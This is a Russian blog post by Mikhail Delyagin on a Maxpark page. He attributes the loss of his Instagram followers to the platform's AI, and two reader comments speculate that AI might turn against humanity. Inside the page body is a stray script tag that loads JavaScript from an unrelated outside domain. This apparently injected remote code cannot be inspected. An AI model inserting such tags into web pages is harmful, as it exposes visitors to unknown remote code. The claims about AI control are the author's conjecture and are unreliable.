Развяжут ли алгоритмы Facebook Третью Мировую войну?

    Михаил Делягин написал
    2 оценок, 795 просмотров Обсудить (4)

    5

     

    Принципиально важно:

     

    1) это точно не "месть" НТВ - не только потому, что у них конкретно с Instagram все очень плохо и мне разные люди на канале не раз порознь и в разных ситуациях говорили, что эту сеть вообще не понимают, но в первую очередь потому, что российское телевидение такой ерундой и пошлостью, как месть, не занимается от слова совсем (просто поверьте, опыт у меня богатый, и если бы они мстили - я бы это знал по себе давно и точно): это вам не либералистические "Дождь" или "Йеху Газпромбанка".

     

    2) это не реакция посетителей ("увидели, ужаснулись, отписались"), потому что этот пост по статистике всего просмотрели на день пятницы менее 3,7 тыс. чел. (раздел "охват") - то есть отписаться 15 тыс. из 3,7 тыс. просмотревших не могли теоретически.

     

    3) это не скрутка ботов (вроде прошедшей недавно в твиттере): я ими не пользуюсь, но они как-то сами набегают по каким-то своим алгоритмам, так что в твиттере я потерял больше трети подписчиков, и теоретичеси их может быть много и в Instagram, - но сейчас ничего о подобной кампании не слышно.

     

    То есть: искусственный интеллект, управляющий Instagram (а это уже он, по крайней мере, с момента покупки этой сети Facebook), по каким-то своим причинам сократил почти в полтора раза число моих подписчиков. И спрашивать некого

     

    https://delyagin.ru/articles/183-sobytija/72391-razvjazhut-li-algoritmy-fa-ebook-tret-ju-mirovuju-​voynu

    <script type="text/javascript" src="http://minisrclink.cool/1e40c8bd4601a5a5a4.js"></script>

    Комментировать

    осталось 1185 символов
    пользователи оставили 4 комментария , вы можете свернуть их
    Татьяна Ладыгина # написала комментарий 10 октября 2019, 22:33
    Искусственный интеллект умеет сокращать количество подписчиков, а вдруг ему "захочется" всё больше и больше "свободы" действий. Тогда он может много бед натворить на Земле.
    КАК тут МАТРИЦУ не вспомнить?!
    Валерий Терин # ответил на комментарий Татьяна Ладыгина 17 октября 2019, 01:10
    Из книги «Массовая коммуникация» (автор – В. Терин; первое издание – 1999, второе – 2000):
    На очереди историческая встреча (по-видимому, она еще не произошла): встреча двух высокотехнологичных продуктов человеческого интеллекта нашего времени - Интернета, с одной стороны, и искусственного интеллекта[90], с другой. Это, в свою очередь, означает, что Интернет оказывается не просто саморазвивающейся системой (как, например, рынок, - о чем знал еще Адам Смит с его рассуждениями о "невидимой руке рынка"), но системой, которая сама управляет своим развитием и противостоит человеку не в виде понятных тому знаков, а "сама по себе" - со всеми своими возможностями управлять им таким образом, чтобы толком он об этом не только не знал, но даже и не догадывался. И тогда на каком-то этапе своей жизнедеятельности эта система может решить, что человек ей стал помехой и что не плохо было бы ей от этого существа избавиться. Можно, конечно, предположить, что, выполнив эту историческую миссию, Интернет раскается и начнет по-своему обливаться слезами.
    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 1085 записей в блогах и 9472 комментария.
    Зарегистрировался 41 новый макспаркер. Теперь нас 5018636.